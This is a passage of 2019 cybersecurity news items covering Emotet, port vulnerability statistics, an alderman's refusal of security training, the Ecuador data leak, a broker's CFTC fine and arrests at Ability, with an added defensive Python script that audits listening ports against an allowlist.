Linked to the North Korean Lazarus Group, Ryuk is thought to have made almost $3.8m for its operators in the six months to January 2019.

Like Trickbot, Emotet was originally a banking Trojan that was re-written to function as a malware loader. Its operators sell access to the botnet for clients to use as a malware distribution network.

According to Malwarebytes, Emotet malware was detected and removed over 1.5 million times between January and September 2018 alone. In July last year, the threat became so serious that the US-CERT was forced to release an alert about Emotet and its capabilities.

Categories: Cyber Risk News

Most Port Vulnerabilities Are Found in Three Ports

Tue, 09/17/2019 - 09:03

The vast majority of vulnerabilities in ports are found in just three, making it theoretically easier for organizations to defend them against attack, according to Alert Logic.

The security vendor analyzed 1.3 petabytes of security data, over 2.8 billion IDS events, 8.2 million verified incidents, and common vulnerabilities for more than 700 SMB customers, in order to compile its Critical Watch Report for 2019.

It claimed that 65% of vulnerabilities it found in Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) ports are linked to SSH (22/TCP), HTTPS (443/TCP) and HTTP (80/TCP).

RDP (3389/TCP) comes in fourth place, which is no surprise given that Microsoft has had to patch it several times, including for the BlueKeep bug, which Redmond warned could provide attackers with WannaCry-like “wormable” capabilities.

The number of vulnerabilities in a port is a good indication of its popularity and it’s no surprise that the top three ports for flaws are also ones exposed to the public-facing internet, Alert Logic said.

However, the findings may provide useful intel for security teams in smaller companies to help them reduce their attack surface quickly and easily.

“As basic guidance, security across all network ports should include defense-in-depth. Ports that are not in use should be closed and organizations should install a firewall on every host as well as monitor and filter port traffic,” the report advised.

“Regular port scans and penetration testing are also best practices to help ensure there are no unchecked vulnerabilities.”

Alert Logic also urged IT security teams to patch and harden any device, software or service connected to ports and to tackle any new vulnerabilities as they appear, as well as changing all default settings and passwords and running regular configuration checks.
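The "close ports that are not in use" advice is only actionable if you know what is listening and on which interfaces. The following is an added example, not Alert Logic's tooling, that parses `ss -tlnp` output and flags every listener bound to all interfaces that is not on an explicit allowlist of port-to-process expectations. The `ss` output and the `ALLOWED` policy are constructed for illustration; on a live host, pass in the real output of `ss -tlnp`.

```python
"""Audit listening TCP sockets: flag anything bound on all interfaces that is
not on an explicit allowlist, so unused ports can be closed or firewalled.

Added example for the 'close unused ports' guidance above; not Alert Logic's
tooling. SAMPLE_SS_OUTPUT and ALLOWED are constructed. On a real host use:
    subprocess.run(["ss", "-tlnp"], capture_output=True, text=True).stdout"""
import re
from typing import Dict, List

# Port -> process expected to own it on this host (assumed local policy).
ALLOWED = {443: "nginx", 22: "sshd"}
# Local addresses that mean "every interface", IPv4 and IPv6.
WILDCARDS = {"0.0.0.0", "*", "[::]", "::"}
PROC_RE = re.compile(r'\(\("([^"]+)"')

SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       128     127.0.0.1:5432       0.0.0.0:*          users:(("postgres",pid=1201,fd=5))
LISTEN  0       511     *:443                *:*                users:(("nginx",pid=990,fd=6))
LISTEN  0       511     *:80                 *:*                users:(("nginx",pid=990,fd=7))
LISTEN  0       50      0.0.0.0:3389         0.0.0.0:*          users:(("xrdp",pid=1550,fd=11))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
LISTEN  0       4096    [::1]:6379           [::]:*             users:(("redis-server",pid=700,fd=6))
"""


def parse_ss(text: str) -> List[Dict]:
    """Turn `ss -tlnp` lines into {addr, port, proc} records."""
    listeners = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue                                  # header or non-listening row
        addr, port = cols[3].rsplit(":", 1)           # works for "[::]:22" too
        m = PROC_RE.search(line)
        listeners.append({"addr": addr, "port": int(port), "proc": m.group(1) if m else "?"})
    return listeners


def audit(text: str, allowed: Dict[int, str] = ALLOWED) -> List[str]:
    """Report remotely reachable listeners that the allowlist does not explain."""
    findings, seen = [], set()
    for l in parse_ss(text):
        if l["addr"] not in WILDCARDS:
            continue                                  # loopback-only: not reachable remotely
        key = (l["port"], l["proc"])
        if key in seen:
            continue                                  # same service on IPv4 and IPv6
        seen.add(key)
        expected = allowed.get(l["port"])
        if expected is None:
            findings.append(f"port {l['port']} ({l['proc']}) listens on all interfaces but is not allowlisted")
        elif expected != l["proc"]:
            findings.append(f"port {l['port']} owned by {l['proc']}, expected {expected}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SS_OUTPUT):
        print(finding)
```

In the constructed sample the audit ignores PostgreSQL and Redis because they only listen on loopback, accepts SSH and HTTPS because the allowlist names them, and reports port 80 and RDP on 3389, which is exactly the pair the report puts in its top four.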

The report found that most unpatched vulnerabilities in the SMB space are over a year old, and that misconfigurations, weak encryption and unsupported Windows versions also represent serious risks.

Categories: Cyber Risk News

City Blocks Email Account of Alderman Who Refuses Cybersecurity Training

Mon, 09/16/2019 - 18:46

Officials in the Tennessee city of Germantown have restricted the email account of an alderman who refuses to undergo cybersecurity training. 

Insurance specialist and married father of one Dean Massey was elected to the position of alderman in 2016. His official DMassey@germantown-tn.gov email account was restricted earlier this month after Massey failed to complete a cybersecurity training course.

According to the Commercial Appeal website, all Germantown officials and city employees were asked to complete the 45-minute course by a specific date and were warned that failure to comply would result in their email access being restricted. However, Massey told Infosecurity Magazine that "there was no policy that mandated the cyber training for elected officials."

Explaining why he refused to complete the cybersecurity training after being instructed to do so by the city's IT Director, Massey said: "I was not aware of any alderman having to take the cyber training in the past, so I thought it was unusual for a city employee to suddenly claim the authority to demand that elected officials click a link to take the training this year. 

"I simply disregarded the emails with the training links until I received a notice from the IT Director advising me that he intended to restrict my government email account."

Massey responded to the imposed restriction by setting up a personal email account—dmassey.cityofgermantown@gmail.com—to handle his official city business. Conducting public business from a personal email address does not violate any Tennessee state laws or ethics guidelines. 

Massey's refusal comes in the wake of a July 2019 ransomware attack on the neighboring city of Collierville, which compromised the town's internal servers. 

Commenting on Massey's argument cited by Commercial Appeal that an elected official shouldn't have to comply with a directive from an unelected official, fellow Germantown alderman Rocky Janda told Infosecurity Magazine: "Mr. Massey came up with that reason for not taking the training. This was a city administrator/mayor decision to make it mandatory for all employees and elected officials due to recent local threats. Staff does not make these kinds of decisions on their own." 

Janda, who himself became a victim of cyber-crime when hackers targeted his company with ransomware, added "Mr. Massey just needs to take the training. It's 45 minutes..."

Massey responded to Janda's comments by stating: "All the elected officials have used and/or currently use personal electronic devices and personal emails addresses for government correspondence."

According to Commercial Appeal, Janda has asked the city administration to discuss a potential censure of Massey's actions to encourage a discussion around cybersecurity issues. Massey has also asked for cybersecurity to be added to the administration's agenda for the next meeting, which will take place on September 23.  

Massey, who has never personally been a victim of a cyber-crime, said: "In my experience the threat of hackers and dangers of cybercrime are probably greater than what is reported in the media, but cities should not get a false sense of security by having city employees and elected officials click a link that provides 45 minutes of generic instruction on how to avoid cyber-crimes."

He added: "I think it would be appropriate and more beneficial for a cyber security specialist to give the entire Board of Mayor and Alderman a presentation on cyber security and allow aldermen to discuss whether more should be done."

Categories: Cyber Risk News

Data of Virtually All Ecuadoreans Leaked Online

Mon, 09/16/2019 - 17:00

The personal data of almost every citizen of Ecuador has been leaked online in a catastrophic data breach. 

The names, phone numbers, and financial information of approximately 20 million Ecuadoreans were found on an unsecured cloud server by researchers working on a web-mapping project at security company vpnMentor.

The enormous 18GB cache of data included personal information relating to individuals who were deceased as well as to the country's living population of approximately 17 million. Personal information relating to 6.7 million Ecuadorean children was among the data leaked.

Exposed files revealed a large amount of sensitive personally identifiable information, such as family records, marriage dates, education histories, employment records, and official ten-digit government ID numbers called cédulas de identidad.

"This data breach is particularly serious simply because of how much information was revealed about each individual," wrote Noam Rotem and Ran Locar from vpnMentor. "Scammers could use this information to establish trust and trick individuals into exposing more information." 

Tax records and financial records revealing the account balances of customers of a large Ecuadorean bank were among the data breached. 

Rotem and Locar wrote, "Although the exact details remain unclear, the leaked database appears to contain information obtained from outside sources. These sources may include Ecuadorian government registries, an automotive association called Aeade, and Biess, an Ecuadorian national bank."

A simple search of the leaked data would enable anyone to put together a list of wealthy Ecuadoreans that would be the envy of kidnappers everywhere. Taken as a whole, the data revealed not just who had large amounts of money in the bank but also where they lived, if they were married, if they had children, what cars they drove, and the license plates of their vehicles. 

Within the leaked records researchers also found an entry and national identification number for WikiLeaks founder Julian Assange, who was granted political asylum by Ecuador in 2012. 

Rotem and Locar found the exposed data in a number of files saved on a server located in Miami, Florida, which was set up and maintained by Ecuadorian marketing and analytics company Novaestrat.

After discovering the data cache, vpnMentor contacted Novaestrat. The Ecuador Computer Emergency Security Team restricted access to the unsecured server on September 11, 2019. 

The breach follows a similar incident that took place recently in another South American country. Last month, a server was found that exposed the voter records of 80% of Chile's 14.3 million citizens.

Categories: Cyber Risk News

Chicago Broker Fined $1.5m for Inadequate Cybersecurity

Mon, 09/16/2019 - 15:57

A US futures and securities clearing broker has been slapped with a $1.5m fine for failing to implement and enforce adequate cybersecurity measures. 

An investigation into Phillip Capital Incorporated (PCI) by the US Commodity Futures Trading Commission (CFTC) revealed a culture in which employees were not monitored to ensure that the cybersecurity of the business was protected and maintained.

Inadequate cybersecurity measures put in place within the Chicago-based company were found to be partially responsible for a data breach and the theft by cyber-criminals of $1m in PCI customer funds. 

The theft occurred when one of the company's IT engineers fell victim to a phishing email. The CFTC criticized PCI for taking too long to report the crime to customers after it happened in early 2018.  

On September 12, 2019, the CFTC issued an order that filed and simultaneously settled charges against PCI "for allowing cyber criminals to breach PCI email systems, access customer information, and successfully withdraw $1 million in PCI customer funds," and also for failing to disclose the breach to its customers "in a timely manner."

In a statement published on its website, the CFTC said that "the order finds that PCI failed to supervise its employees with respect to cybersecurity policy and procedures, a written information systems security program, and customer disbursements."

PCI was issued a civil monetary penalty of $500,000 and ordered to pay $1m in restitution. The broker was credited with the $1m restitution "based on its prompt reimbursement of the customer funds when the fraud was discovered."

The commission's investigation into PCI may be over, but the CFTC plans to keep an eye on the registered futures commission merchant's cybersecurity practices. The order filed by the CFTC requires PCI to provide reports to the commission on its remediation efforts. 

"Cybercrime is a real and growing threat in our markets," said CFTC director of enforcement James McDonald. "While it may not be possible to eliminate all cyber threats, CFTC registrants must have adequate procedures in place—and follow those procedures—to protect their customers and their accounts from potential harm."

Categories: Cyber Risk News

Israeli Cops Arrest Cyber Surveillance Vendor’s Employees

Mon, 09/16/2019 - 11:01

Israeli police have arrested several employees of a domestic company that makes cyber-surveillance tools and raided its offices over the weekend, according to local reports.

Although a court order has prevented many details of the case from making it into the public domain, including the identity of the suspects, the arrests were apparently made under charges of fraud, smuggling and money-laundering.

The individuals are thought to be staff at Ability Computer & Software Industries and Ability Security Systems, subsidiaries of Ability, which markets itself as providing interception technology for mobile cellular and satellite communications.

Founded in 1994 by “military and communication experts,” Ability claims to count governments, military, law enforcement and border control agencies as its customers.

However, there are suspicions that the firm may have broken Israeli laws around the export of specific security-related technologies, according to Haaretz.

The Israeli defense ministry is said to have suspended Ability subsidiaries from its official list of registered defense export companies after it exported geolocation systems without a license.

The firm is also facing a backlash from US regulator the SEC over an anti-fraud investigation dating back to 2017 into its 2015 merger with shell company Cambridge Capital Acquisition Corporation.

Ability also paid out $3m last year to settle out-of-court with investors who said they’d been misled about the state of the firm’s finances.

The police investigation is being undertaken by the International Crime Investigations unit alongside the Director of Security of the Defense Establishment, according to the report.

The news comes just weeks after the Israeli government made moves to ease the process for exporting cyber-weapons to certain countries, despite warnings from the UN and others that such tools are being used by despotic governments to crack down on dissent.

Categories: Cyber Risk News
